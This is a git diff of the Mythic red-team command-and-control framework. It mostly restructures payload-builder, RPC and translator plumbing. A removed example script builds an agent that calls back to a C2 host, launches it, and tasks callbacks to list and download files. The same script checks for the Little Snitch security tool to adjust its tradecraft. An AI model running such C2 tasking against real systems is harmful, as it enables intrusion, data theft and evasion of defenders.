"callback_host": "https://domain.com", - "callback_interval": 20 - } - } - :param filename: String value of the name of the resulting payload - :param tag: Description for the payload for the active callbacks page - :param commands: List of string names for the commands that should be included - :param build_parameters: List of build parameter dictionaries of the form: - { - "name": "version", "value": 4.0 - } - :param destination_host: String name of the host where the payload will go - :param wrapped_payload: If payload_type is a wrapper, wrapped payload UUID - :return: - """ - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": payload_type, - "c2_profiles": c2_profiles, - "filename": filename, - "tag": tag, - "commands": commands, - "build_parameters": build_parameters, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_MythicPayloadRPCResponse(self, - resp: MythicPayloadRPCResponse, - destination_host: str = None) -> MythicPayloadRPCResponse: - c2_list = [] - for c2 in resp.c2info: - c2_list.append({ - "c2_profile": c2["name"], - "c2_profile_parameters": 
c2["parameters"] - }) - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": resp.payload_type, - "c2_profiles": c2_list, - "filename": resp.filename, - "tag": resp.tag, - "commands": resp.commands, - "build_parameters": resp.build_parameters, - "destination_host": destination_host, - "wrapped_payload": resp.wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def register_payload_on_host(self, - uuid: str, - host: str): - """ - Register a payload on a host for linking purposes - :param uuid: - :param host: - :return: - """ - resp = await self.call( - { - "action": "register_payload_on_host", - "task_id": self.task_id, - "uuid": uuid, - "host": host - } - ) - return MythicPayloadRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicResponseRPC.py b/Example_Payload_Type/mythic/MythicResponseRPC.py deleted file mode 100644 index 8ae588a96..000000000 --- a/Example_Payload_Type/mythic/MythicResponseRPC.py +++ /dev/null @@ -1,43 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicResponseRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - - -class MythicResponseRPC(MythicBaseRPC): - async def user_output(self, user_output: str) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "user_output", - "user_output": user_output, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def update_callback(self, callback_info: dict) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "update_callback", - "callback_info": callback_info, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def register_artifact( - self, artifact_instance: str, artifact_type: str, host: str = None - ) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "register_artifact", - "task_id": self.task_id, - "host": host, - "artifact_instance": artifact_instance, - "artifact": artifact_type, - } - ) - return MythicResponseRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/MythicSocksRPC.py b/Example_Payload_Type/mythic/MythicSocksRPC.py deleted file mode 100644 index 3a1b63df6..000000000 --- a/Example_Payload_Type/mythic/MythicSocksRPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicSocksRPCResponse(RPCResponse): - def __init__(self, socks: RPCResponse): - super().__init__(socks._raw_resp) - - -class MythicSocksRPC(MythicBaseRPC): - async def start_socks(self, port: int) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "task_id": self.task_id, - "start": True, - "port": port, - } - ) - return MythicSocksRPCResponse(resp) - - async def stop_socks(self) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "stop": True, - "task_id": self.task_id, - } - ) - return MythicSocksRPCResponse(resp) diff --git a/Example_Payload_Type/mythic/PayloadBuilder.py b/Example_Payload_Type/mythic/PayloadBuilder.py deleted file mode 100644 index 6333bdbff..000000000 --- a/Example_Payload_Type/mythic/PayloadBuilder.py +++ /dev/null @@ -1,302 +0,0 @@ -from enum import Enum -from abc import abstractmethod -from pathlib import Path -import base64 -from CommandBase import * - - -class BuildStatus(Enum): - Success = "success" - Error = "error" - - -class SupportedOS(Enum): - Windows = "Windows" - MacOS = "macOS" - Linux = "Linux" - WebShell = "WebShell" - Chrome 
= "Chrome" - - -class BuildParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - - -class BuildParameter: - def __init__( - self, - name: str, - parameter_type: BuildParameterType = None, - description: str = None, - required: bool = None, - verifier_regex: str = None, - default_value: str = None, - choices: [str] = None, - value: any = None, - verifier_func: callable = None, - ): - self.name = name - self.verifier_func = verifier_func - self.parameter_type = ( - parameter_type if parameter_type is not None else ParameterType.String - ) - self.description = description if description is not None else "" - self.required = required if required is not None else True - self.verifier_regex = verifier_regex if verifier_regex is not None else "" - self.default_value = default_value - if value is None: - self.value = default_value - else: - self.value = value - self.choices = choices - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def parameter_type(self): - return self._parameter_type - - @parameter_type.setter - def parameter_type(self, parameter_type): - self._parameter_type = parameter_type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def verifier_regex(self): - return self._verifier_regex - - @verifier_regex.setter - def verifier_regex(self, verifier_regex): - self._verifier_regex = verifier_regex - - @property - def default_value(self): - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is None: - self._value = value - else: - if self.verifier_func is not None: - self.verifier_func(value) - self._value = value - else: - self._value = value - - def to_json(self): - return { - "name": self._name, - "parameter_type": self._parameter_type.value, - "description": self._description, - "required": self._required, - "verifier_regex": self._verifier_regex, - "parameter": self._default_value - if self._parameter_type == BuildParameterType.String - else "\n".join(self.choices), - } - - -class C2ProfileParameters: - def __init__(self, c2profile: dict, parameters: dict = None): - self.parameters = {} - self.c2profile = c2profile - if parameters is not None: - self.parameters = parameters - - def get_parameters_dict(self): - return self.parameters - - def get_c2profile(self): - return self.c2profile - - -class CommandList: - def __init__(self, commands: [str] = None): - self.commands = [] - if commands is not None: - self.commands = commands - - def get_commands(self) -> [str]: - return self.commands - - def remove_command(self, command: str): - self.commands.remove(command) - - def add_command(self, command: str): - for c in self.commands: - if c == command: - return - self.commands.append(command) - - def clear(self): - self.commands = [] - - -class BuildResponse: - def __init__(self, status: BuildStatus, payload: bytes = None, message: str = None): - self.status = status - self.payload = payload if payload is not None else b"" - self.message = message if message is not None else "" - - def get_status(self) -> BuildStatus: - return self.status - - def 
set_status(self, status: BuildStatus): - self.status = status - - def get_payload(self) -> bytes: - return self.payload - - def set_payload(self, payload: bytes): - self.payload = payload - - def set_message(self, message: str): - self.message = message - - def get_message(self) -> str: - return self.message - - -class PayloadType: - - support_browser_scripts = [] - - def __init__( - self, - uuid: str = None, - agent_code_path: Path = None, - c2info: [C2ProfileParameters] = None, - commands: CommandList = None, - wrapped_payload: str = None, - ): - self.commands = commands - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - self.c2info = c2info - self.uuid = uuid - self.wrapped_payload = wrapped_payload - - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def file_extension(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def supported_os(self): - pass - - @property - @abstractmethod - def wrapper(self): - pass - - @property - @abstractmethod - def wrapped_payloads(self): - pass - - @property - @abstractmethod - def note(self): - pass - - @property - @abstractmethod - def supports_dynamic_loading(self): - pass - - @property - @abstractmethod - def c2_profiles(self): - pass - - @property - @abstractmethod - def build_parameters(self): - pass - - @abstractmethod - async def build(self) -> BuildResponse: - pass - - def get_parameter(self, key): - if key in self.build_parameters: - return self.build_parameters[key].value - else: - return None - - async def set_and_validate_build_parameters(self, buildinfo: dict): - # set values for all of the key-value pairs presented to us - for key, bp in self.build_parameters.items(): - if key in buildinfo and buildinfo[key] is not None: - bp.value = buildinfo[key] - if bp.required and bp.value is None: - raise ValueError( - "{} is a required parameter but has no value".format(key) - ) - - def get_build_instance_values(self): - values = {} - for key, bp in self.build_parameters.items(): - if bp.value is not None: - values[key] = bp.value - return values - - def to_json(self): - return { - "ptype": self.name, - "file_extension": self.file_extension, - "author": self.author, - "supported_os": ",".join([x.value for x in self.supported_os]), - "wrapper": self.wrapper, - "wrapped": self.wrapped_payloads, - "supports_dynamic_loading": self.supports_dynamic_loading, - "note": self.note, - "build_parameters": [b.to_json() for k, b in self.build_parameters.items()], - "c2_profiles": self.c2_profiles, - "support_scripts": [ - a.to_json(self.base_path) for a in self.support_browser_scripts - ], - } diff --git a/Example_Payload_Type/mythic/__init__.py b/Example_Payload_Type/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/Example_Payload_Type/mythic/agent_functions/builder.py b/Example_Payload_Type/mythic/agent_functions/builder.py index 1b8f072df..77c8efd5b 100644 --- a/Example_Payload_Type/mythic/agent_functions/builder.py +++ b/Example_Payload_Type/mythic/agent_functions/builder.py @@ -1,4 +1,5 @@ -from PayloadBuilder import * +from mythic_payloadtype_container.PayloadBuilder import * +from mythic_payloadtype_container.MythicCommandBase import * import asyncio import os from distutils.dir_util import copy_tree diff --git a/Example_Payload_Type/mythic/agent_functions/loadassembly.py b/Example_Payload_Type/mythic/agent_functions/loadassembly.py index 35bf4b84c..917139238 100644 --- 
a/Example_Payload_Type/mythic/agent_functions/loadassembly.py +++ b/Example_Payload_Type/mythic/agent_functions/loadassembly.py @@ -1,6 +1,7 @@ -from CommandBase import * # import the basics +from mythic_payloadtype_container.MythicCommandBase import * # import the basics import json # import any other code you might need -from MythicFileRPC import * # import the code for interacting with Files on the Mythic server +# import the code for interacting with Files on the Mythic server +from mythic_payloadtype_container.MythicFileRPC import * # create a class that extends TaskArguments class that will supply all the arguments needed for this command class LoadAssemblyArguments(TaskArguments): diff --git a/Example_Payload_Type/mythic/generate_docs_from_container.py b/Example_Payload_Type/mythic/generate_docs_from_container.py deleted file mode 100644 index 625847cc1..000000000 --- a/Example_Payload_Type/mythic/generate_docs_from_container.py +++ /dev/null @@ -1,197 +0,0 @@ -#! /usr/env python3 - -import sys -import pathlib -from importlib import import_module -from CommandBase import * -from PayloadBuilder import * - - -def import_all_agent_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("agent_functions/*.py") - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("agent_functions." + pathlib.Path(x).stem) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -root = pathlib.Path(".") -import_all_agent_functions() -commands = [] -payload_type = {} -for cls in PayloadType.__subclasses__(): - payload_type = cls(agent_code_path=root).to_json() - break -for cls in CommandBase.__subclasses__(): - commands.append(cls(root).to_json()) -payload_type["commands"] = commands - -# now generate the docs -root_home = root / payload_type["ptype"] -if not root_home.exists(): - root_home.mkdir() -if not (root_home / "c2_profiles").exists(): - (root_home / "c2_profiles").mkdir() -if not (root_home / "commands").exists(): - (root_home / "commands").mkdir() -# now to generate files -with open(root_home / "_index.md", "w") as f: - f.write( - f"""+++ -title = "{payload_type['ptype']}" -chapter = false -weight = 5 -+++ - -## Summary - -Overview - -### Highlighted Agent Features -list of info here - -## Authors -list of authors - -### Special Thanks to These Contributors -list of contributors -""" - ) -with open(root_home / "c2_profiles" / "_index.md", "w") as f: - f.write( - f"""+++ -title = "C2 Profiles" -chapter = true -weight = 25 -pre = "4. " -+++ - -# Supported C2 Profiles - -This section goes into any `{payload_type['ptype']}` specifics for the supported C2 profiles. -""" - ) -with open(root_home / "development.md", "w") as f: - f.write( - f"""+++ -title = "Development" -chapter = false -weight = 20 -pre = "3. " -+++ - -## Development Environment - -Info for ideal dev environment or requirements to set up environment here - -## Adding Commands - -Info for how to add commands -- Where code for commands is located -- Any classes to call out - -## Adding C2 Profiles - -Info for how to add c2 profiles -- Where code for editing/adding c2 profiles is located -""" - ) -with open(root_home / "opsec.md", "w") as f: - f.write( - f"""+++ -title = "OPSEC" -chapter = false -weight = 10 -pre = "1. 
" -+++ - -## Considerations -Info here - -### Post-Exploitation Jobs -Info here - -### Remote Process Injection -Info here - -### Process Execution -Info here""" - ) -with open(root_home / "commands" / "_index.md", "w") as f: - f.write( - f"""+++ -title = "Commands" -chapter = true -weight = 15 -pre = "2. " -+++ - -# {payload_type['ptype']} Command Reference -These pages provide in-depth documentation and code samples for the `{payload_type['ptype']}` commands. -""" - ) -payload_type["commands"] = sorted(payload_type["commands"], key=lambda i: i["cmd"]) -for i in range(len(payload_type["commands"])): - c = payload_type["commands"][i] - cmd_file = c["cmd"] + ".md" - with open(root_home / "commands" / cmd_file, "w") as f: - f.write( - f"""+++ -title = "{c['cmd']}" -chapter = false -weight = 100 -hidden = false -+++ - -## Summary - -{c['description']} -- Needs Admin: {c['needs_admin']} -- Version: {c['version']} -- Author: {c['author']} - -### Arguments - -""" - ) - for a in c["parameters"]: - f.write( - f"""#### {a['name']} - -- Description: {a['description']} -- Required Value: {a['required']} -- Default Value: {a['default_value']} - -""" - ) - f.write( - f"""## Usage - -``` -{c['help_cmd']} -``` - -""" - ) - if len(c["attack"]) > 0: - f.write( - f"""## MITRE ATT&CK Mapping -""" - ) - for a in c["attack"]: - f.write( - f""" -- {a['t_num']} """ - ) - - f.write( - f""" -## Detailed Summary - -""" - ) diff --git a/Example_Payload_Type/mythic/mythic_service.py b/Example_Payload_Type/mythic/mythic_service.py index 8c4ee8460..461000565 100755 --- a/Example_Payload_Type/mythic/mythic_service.py +++ b/Example_Payload_Type/mythic/mythic_service.py @@ -1,308 +1,3 @@ #!/usr/bin/env python3 -import aio_pika -import os -import sys -import traceback -import base64 -import json -import asyncio -import socket -from CommandBase import * -from PayloadBuilder import * -from pathlib import Path -from importlib import import_module, invalidate_caches - -# set the global hostname variable -hostname = "" -output = "" -exchange = None -container_files_path = "" - - -def import_all_agent_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("agent_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("agent_functions." 
+ Path(x).stem) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", command="", status="", username=""): - global exchange - # status is success or error - try: - message_body = aio_pika.Message(message.encode()) - # Sending the message - await exchange.publish( - message_body, - routing_key="pt.status.{}.{}.{}.{}".format( - hostname, command, status, username - ), - ) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - - -async def callback(message: aio_pika.IncomingMessage): - global hostname - global container_files_path - with message.process(): - # messages of the form: pt.task.PAYLOAD_TYPE.command - pieces = message.routing_key.split(".") - command = pieces[3] - username = pieces[4] - if command == "create_payload_with_code": - try: - # pt.task.PAYLOAD_TYPE.create_payload_with_code.UUID - message_json = json.loads( - base64.b64decode(message.body).decode("utf-8"), strict=False - ) - # go through all the data from rabbitmq to make the proper classes - c2info_list = [] - for c2 in message_json["c2_profile_parameters"]: - params = c2.pop("parameters", None) - c2info_list.append( - C2ProfileParameters(parameters=params, c2profile=c2) - ) - commands = CommandList(message_json["commands"]) - for cls in PayloadType.__subclasses__(): - agent_builder = cls( - uuid=message_json["uuid"], - agent_code_path=Path(container_files_path), - c2info=c2info_list, - commands=commands, - wrapped_payload=message_json["wrapped_payload"], - ) - try: - await agent_builder.set_and_validate_build_parameters( - message_json["build_parameters"] - ) - build_resp = await agent_builder.build() - except Exception as b: - resp_message = { - "status": "error", - "message": "Error in agent creation: " - + str(traceback.format_exc()), - "payload": "", - } - await send_status( - json.dumps(resp_message), - "create_payload_with_code", - "{}".format(username), - ) - return - # we want to capture the build message as build_resp.get_message() - # we also want to capture the final values the agent used for creating the payload, so collect them - build_instances = agent_builder.get_build_instance_values() - resp_message = { - "status": build_resp.get_status().value, - "message": build_resp.get_message(), - "build_parameter_instances": build_instances, - "payload": base64.b64encode(build_resp.get_payload()).decode( - "utf-8" - ), - } - await send_status( - json.dumps(resp_message), - "create_payload_with_code", - "{}".format(username), - ) - - except Exception as e: - resp_message = { - "status": "error", - "message": str(traceback.format_exc()), - "payload": "", - } - await send_status( - json.dumps(resp_message), - "create_payload_with_code", - "{}".format(username), - ) - elif command == "command_transform": - try: - # pt.task.PAYLOAD_TYPE.command_transform.taskID - - message_json = json.loads( - base64.b64decode(message.body).decode("utf-8"), strict=False - ) - final_task = None - for cls in CommandBase.__subclasses__(): - if getattr(cls, "cmd") == message_json["command"]: - Command = cls(Path(container_files_path)) - task = MythicTask( - message_json["task"], - args=Command.argument_class(message_json["params"]), - ) - await task.args.parse_arguments() - await task.args.verify_required_args_have_values() - final_task = await Command.create_tasking(task) - await send_status( - str(final_task), - "command_transform", - "{}.{}".format(final_task.status.value, pieces[4]), - username, - ) - break - if final_task is None: - await 
send_status( - "Failed to find class where command_name = " - + message_json["command"], - "command_transform", - "error.{}".format(pieces[4]), - username, - ) - except Exception as e: - await send_status( - "[-] Mythic error while creating/running create_tasking: \n" - + str(e), - "command_transform", - "error.{}".format(pieces[4]), - username, - ) - return - elif command == "sync_classes": - try: - commands = {} - payload_type = {} - import_all_agent_functions() - for cls in PayloadType.__subclasses__(): - payload_type = cls( - agent_code_path=Path(container_files_path) - ).to_json() - break - for cls in CommandBase.__subclasses__(): - commands[cls.cmd] = cls(Path(container_files_path)).to_json() - payload_type["commands"] = commands - await send_status( - json.dumps(payload_type), "sync_classes", "success", username - ) - except Exception as e: - await send_status( - "Error while syncing info: " + str(traceback.format_exc()), - "sync_classes", - "error.{}".format(pieces[4]), - username, - ) - else: - print("Unknown command: {}".format(command)) - - -async def sync_classes(): - try: - commands = {} - payload_type = {} - import_all_agent_functions() - for cls in PayloadType.__subclasses__(): - payload_type = cls(agent_code_path=Path(container_files_path)).to_json() - break - for cls in CommandBase.__subclasses__(): - commands[cls.cmd] = cls(Path(container_files_path)).to_json() - payload_type["commands"] = commands - await send_status(json.dumps(payload_type), "sync_classes", "success", "") - except Exception as e: - await send_status( - "Error while syncing info: " + str(traceback.format_exc()), - "sync_classes", - "error", - "", - ) - sys.exit(1) - - -async def heartbeat(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the mythic server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="pt.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = os.path.abspath(main_config["container_files_path"]) - if not os.path.exists(container_files_path): - os.makedirs(container_files_path) - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - 
login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(1) - try: - channel = await connection.channel() - # declare our exchange - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - # get a random queue that only the mythic server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("", exclusive=True) - # bind the queue to the exchange so we can actually catch messages - await queue.bind( - exchange="mythic_traffic", routing_key="pt.task.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=100) - print(" [*] Waiting for messages in mythic_service.") - task = queue.consume(callback) - await sync_classes() - result = await asyncio.wait_for(task, None) - except Exception as e: - print(str(e)) - - -# start our service -loop = asyncio.get_event_loop() -asyncio.gather(heartbeat(), mythic_service()) -loop.run_forever() +from mythic_payloadtype_container import mythic_service +mythic_service.start_service_and_heartbeat() diff --git a/Example_Translator/Dockerfile b/Example_Translator/Dockerfile new file mode 100644 index 000000000..b07730832 --- /dev/null +++ b/Example_Translator/Dockerfile @@ -0,0 +1 @@ +FROM itsafeaturemythic/python38_translator_container:0.0.3 \ No newline at end of file diff --git a/C2_Profiles/HTTP/mythic/c2_functions/__init__.py b/Example_Translator/__init__.py similarity index 100% rename from C2_Profiles/HTTP/mythic/c2_functions/__init__.py rename to Example_Translator/__init__.py diff --git a/C2_Profiles/dynamicHTTP/c2_code/__init__.py b/Example_Translator/mythic/__init__.py similarity index 100% rename from C2_Profiles/dynamicHTTP/c2_code/__init__.py rename to Example_Translator/mythic/__init__.py diff --git a/Example_Translator/mythic/c2_functions/C2_RPC_functions.py b/Example_Translator/mythic/c2_functions/C2_RPC_functions.py new file mode 100644 index 000000000..2f17749e4 --- /dev/null +++ b/Example_Translator/mythic/c2_functions/C2_RPC_functions.py @@ -0,0 +1,81 @@ +import json +import base64 +import sys +# translate_from_c2_format gets a message from Mythic that is in the c2-specific format +# and returns a message that's translated into Mythic's JSON format +# If the associated C2Profile has `mythic_encrypts` set to False, then this function should also decrypt +# the message +# request will be JSON with the following format: +# { "action": "translate_from_c2_format", +# "enc_key": None or base64 of key if Mythic knows of one, +# "dec_key": None or base64 of key if Mythic knows of one, +# "uuid": uuid of the message, +# "profile": name of the c2 profile, +# "mythic_encrypts": True or False if Mythic thinks Mythic does the encryption or not, +# "type": None or a keyword for the type of encryption. 
currently only option besides None is "AES256" +# "message": base64 of the message that's currently in c2 specific format +# } +# This should return the JSON of the message in Mythic format + + +async def translate_from_c2_format(request) -> dict: + if not request["mythic_encrypts"]: + return json.loads(base64.b64decode(request["message"]).decode()[36:]) + else: + return json.loads(base64.b64decode(request["message"])) + + +# translate_to_c2_format gets a message from Mythic that is in Mythic's JSON format +# and returns a message that's formatted into the c2-specific format +# If the associated C2Profile has `mythic_encrypts` set to False, then this function should also encrypt +# the message +# request will be JSON with the following format: +# { "action": "translate_to_c2_format", +# "enc_key": None or base64 of key if Mythic knows of one, +# "dec_key": None or base64 of key if Mythic knows of one, +# "uuid": uuid of the message, +# "profile": name of the c2 profile, +# "mythic_encrypts": True or False if Mythic thinks Mythic does the encryption or not, +# "type": None or a keyword for the type of encryption. currently only option besides None is "AES256" +# "message": JSON of the mythic message +# } +# This should return the bytes of the message in c2 specific format + +async def translate_to_c2_format(request) -> bytes: + if not request["mythic_encrypts"]: + return base64.b64encode(request["uuid"].encode() + json.dumps(request["message"]).encode()) + else: + return json.dumps(request["message"]).encode() + + +# generate_keys gets a message from Mythic that is in Mythic's JSON format +# and returns a a JSON message with encryption and decryption keys for the specified type +# request will be JSON with the following format: +# { "action": "generate_keys", +# "message": JSON of the C2 parameter that has a crypt_type that's not None and not empty +# } +# example: +# {"action":"generate_keys", +# "message":{ +# "id":39, +# "name":"AESPSK", +# "default_value":"aes256_hmac\nnone", +# "required":false, +# "randomize":false, +# "verifier_regex":"", +# "parameter_type":"ChooseOne", +# "description":"Crypto type", +# "c2_profile":"http", +# "value":"none", +# "payload":"be8bd7fa-e095-4e69-87aa-a18ba73288cb", +# "instance_name":null, +# "operation":null, +# "callback":null}} +# This should return the dictionary of keys like: +# { +# "enc_key": "base64 of encryption key here", +# "dec_key": "base64 of decryption key here", +# } + +async def generate_keys(request) -> dict: + return {"enc_key": None, "dec_key": None} \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/mythic/__init__.py b/Example_Translator/mythic/c2_functions/__init__.py similarity index 100% rename from C2_Profiles/dynamicHTTP/mythic/__init__.py rename to Example_Translator/mythic/c2_functions/__init__.py diff --git a/C2_Profiles/HTTP/mythic/c2_service.sh b/Example_Translator/mythic/c2_service.sh similarity index 100% rename from C2_Profiles/HTTP/mythic/c2_service.sh rename to Example_Translator/mythic/c2_service.sh diff --git a/Example_Translator/mythic/mythic_service.py b/Example_Translator/mythic/mythic_service.py new file mode 100755 index 000000000..651840211 --- /dev/null +++ b/Example_Translator/mythic/mythic_service.py @@ -0,0 +1,3 @@ +#!/usr/bin/env python3 +from mythic_translator_container import mythic_service +mythic_service.start_service_and_heartbeat(debug=True) diff --git a/C2_Profiles/HTTP/mythic/rabbitmq_config.json b/Example_Translator/mythic/rabbitmq_config.json similarity index 100% rename from 
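
The Example_Translator stubs above deliberately do as little as possible: generate_keys hands back empty keys and the translate functions only wrap or unwrap base64-encoded JSON. For comparison, here is a minimal sketch of a generate_keys that actually honors a non-"none" crypt_type. It assumes, per the comment block above, that Mythic expects base64-encoded keys back; the choice of one random 32-byte key shared for both directions, and reading the crypt type out of the parameter's "value" field, are illustrative assumptions rather than something this diff specifies.

import base64
import os

# Hypothetical alternative to the stub generate_keys above.
# Assumptions: the crypt type arrives in the C2 parameter's "value" field,
# and an AES256-style type wants one random 32-byte key, base64-encoded,
# reused for both the encryption and decryption sides.
async def generate_keys(request) -> dict:
    crypt_type = request.get("message", {}).get("value", "none")
    if not crypt_type or crypt_type == "none":
        # nothing to generate for this parameter instance
        return {"enc_key": None, "dec_key": None}
    key = base64.b64encode(os.urandom(32)).decode()
    return {"enc_key": key, "dec_key": key}
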
C2_Profiles/HTTP/mythic/rabbitmq_config.json rename to Example_Translator/mythic/rabbitmq_config.json diff --git a/LICENSE b/LICENSE index 6f6bb589a..85d09ef9e 100755 --- a/LICENSE +++ b/LICENSE @@ -51,3 +51,26 @@ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + +## Wait For It - https://github.com/vishnubob/wait-for-it +The MIT License (MIT) +Copyright (c) 2016 Giles Hall + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/Mythic_CLI/example.py b/Mythic_CLI/example.py deleted file mode 100644 index 238bb3a05..000000000 --- a/Mythic_CLI/example.py +++ /dev/null @@ -1,135 +0,0 @@ -from mythic import * -from sys import exit -from os import system - - -async def scripting(): - # sample login - mythic = Mythic( - username="mythic_admin", - password="mythic_password", - server_ip="192.168.205.151", - server_port="7443", - ssl=True, - global_timeout=-1, - ) - print("[+] Logging into Mythic") - await mythic.login() - await mythic.set_or_create_apitoken() - - p = Payload( - payload_type="apfell", - c2_profiles={ - "HTTP":[ - {"name": "callback_host", "value": "http://192.168.205.151"}, - {"name": "callback_interval", "value": 4} - ] - }, - tag="test build", - filename="scripted_apfell.js") - print("[+] Creating new apfell payload") - resp = await mythic.create_payload(p, all_commands=True, wait_for_build=True) - print("[*] Downloading apfell payload") - payload_contents = await mythic.download_payload(resp.response) - print("[*] waiting for new callbacks...") - await mythic.listen_for_new_callbacks(analyze_callback) - print("[*] waiting for new files...") - await mythic.listen_for_new_files(analyze_file_upload_download) - with open("scripted_apfell.js", 'wb') as f: - f.write(payload_contents) - system("osascript scripted_apfell.js &") - print("[+] started jxa agent locally") - - new_op = await mythic.create_operation(Operation(name="test", admin=Operator(username="mythic_admin"))) - await json_print(new_op) - -async def analyze_callback(mythic, callback): - try: - task = Task( - callback=callback, command="ls", params="." 
- ) - print("[+] got new callback, issuing ls") - submit = await mythic.create_task(task, return_on="completed") - print("[*] waiting for ls results...") - results = await mythic.gather_task_responses(submit.response.id, timeout=20) - folder = json.loads(results[0].response) - print("[*] going through results looking for interesting files...") - for f in folder["files"]: - if f["name"] == "apfellserver": - task = Task( - callback=callback, command="download", params="apfellserver" - ) - print("[+] found an interesting file, tasking it for download") - await mythic.create_task(task, return_on="submitted") - task = Task( - callback=callback, command="list_apps" - ) - print("[+] tasking callback to list running applications") - list_apps_submit = await mythic.create_task(task, return_on="submitted") - print("[*] waiting for list_apps results...") - results = await mythic.gather_task_responses(list_apps_submit.response.id) - apps = json.loads(results[0].response) - print("[*] going through results looking for dangerous processes...") - for a in apps: - if "Little Snitch Agent" in a["name"]: - list_apps_submit.response.comment = "Auto processed, created alert on Little Snitch Agent, updating block lists" - await mythic.set_comment_on_task(list_apps_submit.response) - print("[+] found a dangerous process! Little Snitch Agent - sending alert to operators") - await mythic.create_event_message(message=EventMessage(message="LITTLE SNITCH DETECTED on {}".format(callback.host), level='warning')) - resp = await mythic.get_all_disabled_commands_profiles() - print("[+] Getting/creating disabled command profile to prevent bad-opsec commands based on dangerous processes") - snitchy_block_list_exists = False - for cur_dcp in resp.response: - if cur_dcp.name == "snitchy block list": - snitchy_block_list_exists = True - dcp = cur_dcp - if not snitchy_block_list_exists: - dcp = DisabledCommandsProfile(name="snitchy block 